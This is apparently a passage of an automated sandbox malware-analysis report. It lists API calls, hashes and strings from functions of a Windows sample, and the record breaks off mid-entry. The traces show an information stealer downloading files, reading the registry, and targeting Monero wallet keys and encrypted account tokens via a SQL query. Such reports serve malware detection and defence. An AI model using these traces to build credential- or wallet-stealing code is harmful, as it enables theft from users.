                  • Opcode ID: 7513d654d497932412e1a48cf498f2cd27c9bb387656c023e463c117d8c717ba
                  • Instruction ID: 687a249a3d712953fe80b0350aac56fdc085d295d8ced718eb173e7e5ce38172
                  • Opcode Fuzzy Hash: 7513d654d497932412e1a48cf498f2cd27c9bb387656c023e463c117d8c717ba
                  • Instruction Fuzzy Hash: 5921C9B1E44258ABDB00DFD4DD49FAFBBBCEB48B14F104519F605BB280DB7869018BA5
                  Function 009A60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009A4839
                    • Part of subcall function 009A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 009A4849
                  • InternetOpenA.WININET(009C0DF7,00000001,00000000,00000000,00000000), ref: 009A610F
                  • StrCmpCA.SHLWAPI(?,015EF828), ref: 009A6147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 009A618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009A61B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 009A61DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 009A620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 009A6249
                  • InternetCloseHandle.WININET(?), ref: 009A6253
                  • InternetCloseHandle.WININET(00000000), ref: 009A6260
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: 337f1674a3c7e3506b29f70741117c93c7e740bd28a0eb4573c60038c4c17bab
                  • Instruction ID: 58bd18e5efee3cf249bf3b74066e29e9a3fba5f70eb4c7c8f9f805030e68346c
                  • Opcode Fuzzy Hash: 337f1674a3c7e3506b29f70741117c93c7e740bd28a0eb4573c60038c4c17bab
                  • Instruction Fuzzy Hash: 705140B1900218ABDF20DFA0DD89BEE77B8FB45705F108498B605AB1C1DB746E85CFA5
                  Function 009ABA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                  • lstrlen.KERNEL32(00000000), ref: 009ABC9F
                    • Part of subcall function 009B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009B8E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 009ABCCD
                  • lstrlen.KERNEL32(00000000), ref: 009ABDA5
                  • lstrlen.KERNEL32(00000000), ref: 009ABDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: 78608b69a567fe05ee81ce9761930b4e43cd6b6aebbe193fc8c2b2b70c29b382
                  • Instruction ID: d7116f51c3d24809ffd246f1bdfa23a20f0ed215d744c87083d872da2e885959
                  • Opcode Fuzzy Hash: 78608b69a567fe05ee81ce9761930b4e43cd6b6aebbe193fc8c2b2b70c29b382
                  • Instruction Fuzzy Hash: D9B13D71910108ABDB14FBA0DE96FEE733DAF94314F404168F506A7492EF346E49CBA6
                  Function 009B6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: 53cf13e9edd3bf30000fa3739547d1c399ed8d693afc02088f92bb48305d2386
                  • Instruction ID: 1cd947de59b49527b8b5818ac6bef19ba19a82556fe90b3ff63aa12873b17d64
                  • Opcode Fuzzy Hash: 53cf13e9edd3bf30000fa3739547d1c399ed8d693afc02088f92bb48305d2386
                  • Instruction Fuzzy Hash: 2BF05E34908289EFD344DFE4E98976C7B78FB04713F040198E6098B290DE746F41AB96
                  Function 009A4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 009A4FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009A4FD1
                  • InternetOpenA.WININET(009C0DDF,00000000,00000000,00000000,00000000), ref: 009A4FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 009A5011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 009A5041
                  • InternetCloseHandle.WININET(?), ref: 009A50B9
                  • InternetCloseHandle.WININET(?), ref: 009A50C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: 2f9fc7381939fb8a5ae5e5ed69a6c96bbfa19d520e5ccb55553671705fd2752f
                  • Instruction ID: c985d8cafe066ce5d185fc2caf637b6eb53b0f43a10c5ac7c33e7984bc58ca11
                  • Opcode Fuzzy Hash: 2f9fc7381939fb8a5ae5e5ed69a6c96bbfa19d520e5ccb55553671705fd2752f
                  • Instruction Fuzzy Hash: 6131F8B4A40218ABDB20CF54DD85BDCB7B8EB48704F1081D9FB09A7281DB746EC58F99
                  Function 009B83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 009B8426
                  • wsprintfA.USER32 ref: 009B8459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 009B847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 009B848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 009B8499
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                  • RegQueryValueExA.ADVAPI32(00000000,015EF208,00000000,000F003F,?,00000400), ref: 009B84EC
                  • lstrlen.KERNEL32(?), ref: 009B8501
                  • RegQueryValueExA.ADVAPI32(00000000,015EF1A8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,009C0B34), ref: 009B8599
                  • RegCloseKey.ADVAPI32(00000000), ref: 009B8608
                  • RegCloseKey.ADVAPI32(00000000), ref: 009B861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: bca225e49612631efa066bf6322b3a29ea53055f83bac8840a9a902402e0bcbf
                  • Instruction ID: a4e4308ed63e4e481a817cf533a1a8e406455192911e15b027730386932f2e3b
                  • Opcode Fuzzy Hash: bca225e49612631efa066bf6322b3a29ea53055f83bac8840a9a902402e0bcbf
                  • Instruction Fuzzy Hash: A121E7B1910218ABDB24DB54DD85FE9B7BDFB48710F00C598A609A7180DF716A85CFE4
                  Function 009B7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009B76A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B76AB
                  • RegOpenKeyExA.ADVAPI32(80000002,015DC420,00000000,00020119,00000000), ref: 009B76DD
                  • RegQueryValueExA.ADVAPI32(00000000,015EF220,00000000,00000000,?,000000FF), ref: 009B76FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 009B7708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: 0e42e76201e8482ff12bb6a56600b901739aa8fb58a5289cb574d7599613ea8e
                  • Instruction ID: e95ad1bd09a3063c468980a83c8bac4ac75cc4f4bda941b683040966c3a2a40f
                  • Opcode Fuzzy Hash: 0e42e76201e8482ff12bb6a56600b901739aa8fb58a5289cb574d7599613ea8e
                  • Instruction Fuzzy Hash: C0014FB5A04208BBDB00DBE4DDC9FA9B7BCEB88701F104554FA059B290EE74A9048B52
                  Function 009B7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009B7734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B773B
                  • RegOpenKeyExA.ADVAPI32(80000002,015DC420,00000000,00020119,009B76B9), ref: 009B775B
                  • RegQueryValueExA.ADVAPI32(009B76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 009B777A
                  • RegCloseKey.ADVAPI32(009B76B9), ref: 009B7784
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: CurrentBuildNumber
                  • API String ID: 3225020163-1022791448
                  • Opcode ID: 35f163c41fa13229779c1e5f0ab6bcdabdb8f1a135da106228279c381c9ecb52
                  • Instruction ID: 949e273d326f48005ca3f9640a73c09e10c90ab87ea954fe3b1af4b11f2d81de
                  • Opcode Fuzzy Hash: 35f163c41fa13229779c1e5f0ab6bcdabdb8f1a135da106228279c381c9ecb52
                  • Instruction Fuzzy Hash: D30117B5A40348BBDB10DBE4DC89FAEB7BCEB48705F104559FA05AB281DE746A00CF52
                  Function 009B40B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 009B40D5
                  • RegOpenKeyExA.ADVAPI32(80000001,015EE708,00000000,00020119,?), ref: 009B40F4
                  • RegQueryValueExA.ADVAPI32(?,015EEDA0,00000000,00000000,00000000,000000FF), ref: 009B4118
                  • RegCloseKey.ADVAPI32(?), ref: 009B4122
                  • lstrcat.KERNEL32(?,00000000), ref: 009B4147
                  • lstrcat.KERNEL32(?,015EEC20), ref: 009B415B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValuememset
                  • String ID:
                  • API String ID: 2623679115-0
                  • Opcode ID: e3779450b2ac340b77b8e5907d2c339b0702bbdaae2dcb8ddaa82b0130a4daa5
                  • Instruction ID: 6008cfbf89fd457f0d23774b1c6534b4c8df0e74c8357244d298a9f0c51fea59
                  • Opcode Fuzzy Hash: e3779450b2ac340b77b8e5907d2c339b0702bbdaae2dcb8ddaa82b0130a4daa5
                  • Instruction Fuzzy Hash: 5A419CB6D101086BDB14EBE0DC96FFE737DA7C8300F004559B6165B181EE75AB888BD2
                  Function 009A99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009A99EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 009A9A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 009A9A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,009A148F,00000000), ref: 009A9A5A
                  • LocalFree.KERNEL32(009A148F), ref: 009A9A90
                  • CloseHandle.KERNEL32(000000FF), ref: 009A9A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: 48cde4cfeadf20c45854af154feb7ff44ff7a2bff8ffcaf3195e06cdf058081d
                  • Instruction ID: d15be703412b474ae392b173ca0dde1e4498a7cde1531a4c6655f7667d03a430
                  • Opcode Fuzzy Hash: 48cde4cfeadf20c45854af154feb7ff44ff7a2bff8ffcaf3195e06cdf058081d
                  • Instruction Fuzzy Hash: 10314BB4A00209EFDF14CF94C985BEE77B9FF49310F108159E915AB290DB78AA41CFA1
                  Function 009BC84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
